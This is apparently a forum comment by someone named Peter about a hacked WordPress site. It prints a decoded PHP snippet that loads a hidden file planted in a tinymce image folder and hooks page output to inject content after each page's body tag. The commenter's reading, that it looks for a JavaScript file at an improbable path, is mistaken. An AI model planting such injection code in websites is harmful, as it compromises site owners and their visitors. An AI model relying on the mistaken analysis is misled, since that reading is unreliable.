The above base64 encrypted string decodes to:
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home3/answerun/public_html/testing-2/wp-includes/js/tinymce/themes/advanced/skins/default/img/js.php')){include_once('/home3/answerun/public_html/testing-2/wp-includes/js/tinymce/themes/advanced/skins/default/img/js.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\<body/si',$c)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}
which, if I ‘decode’ correctly, tries to find a specific java script file in a specific directory (which is too specific IMHO) and tries to run a function. The chance that this js file is found in the mention location is a million to one, unless it has been custom prepared for degmsb’s setup.
Peter
